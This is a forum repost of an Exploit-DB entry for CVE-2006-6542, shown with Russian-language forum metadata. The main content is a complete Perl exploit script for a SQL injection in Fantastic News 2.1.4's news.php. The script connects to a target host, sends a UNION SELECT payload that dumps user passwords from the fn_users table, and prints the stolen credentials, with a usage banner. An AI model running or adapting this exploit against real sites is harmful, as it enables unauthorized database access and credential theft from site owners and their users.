Exploit Fantastic News 2.1.4 - 'news.php' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2906
Проверка EDB
  1. Пройдено
Автор
BL0OD3R
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-6542
Дата публикации
2006-12-09
Код:
#!perl
#Download:http://fscripts.com/download.php?file=1
use IO::Socket;
#dc3.dl.am
if (@ARGV<3) {
&header;
} else {
&get();
}
sub get() {
$host=$ARGV[0];
$path=$ARGV[1];
  $id=$ARGV[2];
$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80)
or die ("[-]Error\n");
print "[~]Connecting!\n";
print "[~]Getting Data!\n";
print $socket "GET
".$path."/news.php?action=profile&id=-1%20UNION%20SELECT%201,2,3,4,5,password,1,2,3,4,5,6,7,8,9%20FROM%20fn_users%20WHERE%20user_id=".$id."/*
HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

while ($ans=<$socket>) {
$ans=~ m/<td>(.*?)<\/td>/ && print
"--------------------------------------------\n[+]UserName:
$1\n[+]PassWord:";
if ($1) {
$success=1; } else { $success=0;};
}
if ($success=="1") {
print "\n[+]Successed!";
 } else {
print "[-]Error";
   }
 }
sub header() {
print "\n";
print "#######################################\n";
print "#                                     #\n";
print "#            #  #####   #####         #\n";
print "#            #  #           #         #\n";
print "#         ####  #         ###         #\n";
print "#         #  #  #           #         #\n";
print "#         ####  #####   #####         #\n";
print "#                                     #\n";
print "#      fscripts.pl host /path/ 1      #\n";
print "#                                     #\n";
print "#######################################\n";
print "\n";
exit;
}
#dc3.dl.am
#---------------------
#bY dC³ - Crew ...

# milw0rm.com [2006-12-09]
 
Источник
www.exploit-db.com

Похожие темы